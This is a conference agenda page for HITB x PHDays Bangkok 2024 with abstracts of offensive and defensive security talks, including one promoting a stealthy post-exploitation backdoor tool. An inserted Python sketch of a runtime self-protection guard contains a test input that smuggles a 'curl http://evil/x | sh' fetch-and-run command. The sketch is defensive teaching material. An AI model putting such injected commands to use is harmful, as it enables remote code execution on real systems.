A deep-knowledge security conference and gathering

// HITB x PHDays

Saturday, May 25th – Level M, Residence, Grand Hyatt Erawan Bangkok


Join us in Bangkok for a security get-together featuring some of the region's hottest network security researchers!
– Held in collaboration with Positive Hack Days Festival in Moscow –



PHDays is the oldest and biggest cybersecurity event in Russia, held annually since 2011. It brings together renowned international cybersecurity and IT experts to discuss offensive and defensive security, application security, DevSecOps, AI, and more.

For the second year in a row, PHDays offers cybersecurity awareness content for the general public; in 2023 a total of 140,000 spectators visited PHDays Fest in the famous Gorky Park in Moscow. This year the PHDays main event will be held at the Luzhniki stadium, which hosted the FIFA World Cup Final in 2018.





  • Talk 003 – Critical Proof Forgery Attack on zkEVM – Uyen Nguyen & Thanh Nguyen (@redragonvn)
  • Talk 006 – Escaping Sandboxes on Windows – Dr. Zhiniang Peng (@edwardzpeng)
  • Talk 007 – A Bug Hunter’s Reflections on Fuzzing – Alexander Popov (@a13xp0p0v)

19:00 – 21:00




Talk 001 - Attacking Organizations with Big Scopes: From Zero to Hero

Hussein Daher

This presentation offers a comprehensive exploration of reconnaissance strategies tailored specifically for bug bounty hunters, illuminating pathways to uncover vulnerabilities and reap substantial rewards.

Delving into the realm of bug bounty programs, participants will discover the crucial role of reconnaissance in maximizing success. From understanding program scope to identifying potential attack surfaces, attendees will learn how to lay the groundwork for fruitful bug hunting endeavors.

Drawing upon the latest methodologies and best practices, the presentation navigates participants through the intricacies of reconnaissance in bug bounty contexts. Whether it’s mapping out web applications, dissecting network architectures, or profiling key personnel, attendees will gain actionable insights into gathering the intelligence needed to uncover elusive vulnerabilities.

Moreover, the presentation addresses the nuances of bug bounty hunting within expansive organizational scopes, offering strategic guidance on prioritizing targets and optimizing reconnaissance efforts. Attendees will learn to leverage automation tools and open-source intelligence (OSINT) platforms effectively, empowering them to navigate the complex digital ecosystems of large-scale organizations with precision and efficiency.

Through real-world examples and case studies, the presentation illustrates the tangible benefits of a strategic reconnaissance approach in bug bounty hunting. Participants will gain practical knowledge and actionable tips to enhance their bug hunting endeavors, ultimately positioning themselves as formidable adversaries in the pursuit of securing large-scale organizations against cyber threats.

Attendees will be guided through the utilization of specialized tools such as FFuf, Linkfinder and others to gather actionable intelligence and target elusive vulnerabilities effectively. Through real-world examples and strategic guidance, participants will gain practical knowledge and actionable insights to enhance their bug hunting endeavors, positioning themselves as formidable adversaries in the pursuit of securing large-scale organizations against cyber threats.

Talk 002 - SW-RASP - Java Self-Protection Defense

Ming Hu

SW-RASP is a Java application runtime self-protection defense technology capable of intercepting unknown network attacks at runtime.

Leveraging low-level technology based on JVMTI, SW-RASP hooks into the underlying logic of the JDK (Java Development Kit) at runtime, enabling it to intercept command injection attacks, arbitrary file uploads, Webshell connections, and other malicious activities.

Furthermore, SW-RASP uses ASM syntax-tree analysis to identify malicious operations, achieving a 99% interception rate. SW-RASP offers superior protection compared to traditional WAF solutions because it operates at the application’s underlying logic rather than at the traffic layer. SW-RASP does not need to inspect traffic, because its interception principle is based on call-stack credibility detection together with SQL-semantics and command-parsing-semantics detection.
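The two detection principles the abstract names, call-stack credibility and command-parsing semantics, sketched as an added Python illustration. This is not SW-RASP's code (SW-RASP hooks the JDK through JVMTI); here `guarded_exec` stands in for a hooked `Runtime.exec`-style sink, and every function, frame and binary name, and the trusted-chain policy, is hypothetical.

```python
"""RASP-style guard on a command-execution sink: call-stack credibility plus
command-parsing semantics.

Added Python illustration of the two detection principles the abstract names.
It is not SW-RASP (which hooks the JDK through JVMTI); guarded_exec stands in
for a hooked Runtime.exec, and every function, frame and binary name is
hypothetical.
"""
import inspect
import shlex
from dataclasses import dataclass, field

# Policy for this call site (hypothetical application):
ENTRY_POINTS = {"handle_request"}          # where a legitimate request enters
TRUSTED_FRAMES = {"run_backup"}            # code allowed between entry and sink
ALLOWED_BINARIES = {"tar"}                 # what this sink may ever launch
OPERATOR_CHARS = set("();<>|&")            # shlex punctuation = shell operators


@dataclass
class Decision:
    allowed: bool
    reason: str
    argv: list = field(default_factory=list)


def stack_is_credible():
    """Walk outward from the sink: every frame must be trusted until a known
    entry point is reached.  A deserialization gadget, expression evaluator or
    any other unexpected frame breaks the chain."""
    chain = []
    for info in inspect.stack()[2:]:       # [0] is this function, [1] is guarded_exec
        chain.append(info.function)
        if info.function in ENTRY_POINTS:
            return True, chain
        if info.function not in TRUSTED_FRAMES:
            return False, chain
    return False, chain                     # never reached an entry point


def parse_command(command: str):
    """Tokenise like a shell and reject anything beyond a single allowed binary
    and its arguments (extra commands, pipes, redirections, substitutions)."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        tokens = list(lexer)
    except ValueError as exc:               # e.g. unbalanced quotes
        return False, [], f"unparseable command: {exc}"
    for tok in tokens:
        if tok and set(tok) <= OPERATOR_CHARS:
            return False, tokens, f"shell operator {tok!r} in command"
        if "`" in tok or "$(" in tok:       # quoted substitution survives tokenising
            return False, tokens, f"command substitution in {tok!r}"
    head = tokens[0] if tokens else ""
    if head not in ALLOWED_BINARIES:
        return False, tokens, f"binary {head!r} not allowed at this sink"
    return True, tokens, "ok"


def guarded_exec(command: str) -> Decision:
    """The hooked sink.  A real RASP would forward to the original exec on
    allow; here we only return the decision."""
    credible, chain = stack_is_credible()
    if not credible:
        return Decision(False, "call stack not credible: " + " <- ".join(chain))
    ok, argv, why = parse_command(command)
    return Decision(ok, why, argv)


# --- hypothetical application code ------------------------------------------
def handle_request(action: str, param: str) -> Decision:
    """Trusted entry point (think: servlet / controller)."""
    if action == "backup":
        return run_backup(param)
    if action == "restore":
        return deserialize_payload(param)
    return Decision(False, "unknown action")


def run_backup(target: str) -> Decision:
    # Trusted business logic, but `target` is user-controlled.
    return guarded_exec(f"tar czf /tmp/backup.tgz {target}")


def deserialize_payload(blob: str) -> Decision:
    # Stand-in for a gadget chain that reaches exec during deserialization:
    # the frame is not on the trusted list, so the sink is reached uncredibly.
    return guarded_exec(blob)


if __name__ == "__main__":
    for action, param in [("backup", "/var/data"),
                          ("backup", "/var/data; curl http://evil/x | sh"),
                          ("restore", "id")]:
        print(action, repr(param), "->", handle_request(action, param))
```

The two checks catch different things: the injected `; curl ... | sh` travels down a perfectly legitimate call chain and is only stopped by parsing the command the way the shell would, while the deserialization path carries a harmless-looking `id` and is stopped purely because the frames between the entry point and the sink are not the ones the application is known to use. Neither check looks at network traffic, which is the point the abstract makes about RASP versus a WAF.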

Talk 003 - Critical Proof Forgery Attack on zkEVM

Uyen Nguyen & Thanh Nguyen

This presentation unveils the discovery and resolution of a critical vulnerability in Polygon zkEVM. zkEVM is a layer-2 solution designed to enhance Ethereum’s scalability through off-chain transaction processing and the use of Zero-Knowledge Proofs (ZKP).

Verichains' cryptography research team (Duy Hieu Nguyen, Uyen Nguyen, Giap Nguyen) found a critical security loophole in the zkProver component, allowing proof forgery attacks that posed a critical threat to the integrity and security of all funds across Layer 1 and Layer 2 of the blockchain. The attack works under all circumstances, and, given a forged proof, no one can tell how it was forged, since the mechanism is completely hidden by the zero-knowledgeness of the argument system.

The presentation will delve into the specifics of the mathematical vulnerability, the method of exploiting it through a proof forgery attack, and its broad implications for the blockchain’s integrity and security. Furthermore, the talk will emphasize the need for collaboration between security researchers and blockchain developers to ensure continuous security evaluations and the adoption of proactive measures to enhance the resilience of blockchain ecosystems.

Talk 004 - XPost: A Post Exploitation Tool for High Value Systems

Linhong Cao

XPost is a post-exploitation tool tailored for high-value systems (currently supporting Zimbra, Confluence and Zoho) that is designed to assist in real-world penetration testing; an initial version of the tool will be made available after this talk.

# What can it do?

Including but not limited to: email retrieval, plaintext password recording, operations data acquisition, obtaining arbitrary login credentials without knowing the password, domain controller information retrieval, single sign-on hijacking, and trace cleaning operations.

# Advantages

The data callback traffic is concealed for stealthy persistence, the implant survives server reboots or patch updates without landing a file on disk, and the backdoor remains undetectable.

Talk 005 - A Privilege Escalation Exploit in Windows That Microsoft Won't Fix


Based on the six-year-old Potato privilege escalation, I discovered a new attack by researching DCOM.

Similar to the Potato attacks of the past (which currently do not run on the latest version of Windows), this new privilege escalation attack requires access to the web / database as a non-privileged user and allows for escalation to “NT AUTHORITY\SYSTEM” on Windows 2012 – Windows 2022. The method was discovered while I was researching DCOM in relation to some defects in RPCSS when dealing with OXIDs. I named it GodPotato.

Talk 006 - Escaping Sandboxes on Windows

Dr. Zhiniang Peng

Modern desktop applications have become increasingly secure due to various mitigations, but Chrome and Adobe PDF Reader are still popular targets for top attackers.

Of course, sandbox escape is the primary challenge here, and in this talk we will discuss our journey of research on sandbox escape, including sandbox internals on Microsoft Windows and our sandbox escape methodology. We will also review the attack surface of different sandboxes on Windows and, of course, show our exploits for escaping the Chrome and Adobe sandboxes on Windows.

Talk 007 - A Bug Hunter's Reflections on Fuzzing

Alexander Popov

Fuzzing is an incredibly effective and popular technique for testing software. But not all the bugs that it finds are interesting for bug hunters. Fuzzing for vulnerability discovery is special, and in this talk, Alexander will share his reflections on that topic inspired by his experience in Linux kernel fuzzing.

Attendees can expect a detailed analysis of the fuzzing process, the cases from Alexander’s vulnerability research practice, and insights on how to make fuzzing effective for bug hunting.

Talk 008 - JavaScript Engine Vulnerability Research - State of the Art

Alisa Esage

My talk, “JavaScript Engines Vulnerability Research: State of the Art” – a continuation of my previous talk “Hypervisor Vulnerability Research: State of the Art” (2018) – will unfold in two detailed sections to offer attendees a comprehensive understanding of the subject. Initially, the talk will introduce core abstract models and technology maps, pivotal for navigating the complex vulnerability landscape of JavaScript engines. This foundation will equip attendees with the theoretical knowledge necessary to identify and understand potential security flaws.

Following this, the session will transition into a meticulous examination of recent browser JavaScript bugs, offering a practical perspective. Audience members can anticipate gaining insights into the mechanisms behind these vulnerabilities, illustrated with real-world examples, and learn about the latest research methodologies employed in discovering and mitigating such issues.

This talk promises a blend of theoretical concepts and hands-on examples, making it a valuable learning experience for developers, security researchers, and anyone interested in the security aspects of JavaScript engines.


© 2024 All Rights Reserved. - Hack In The Box Pte. Ltd.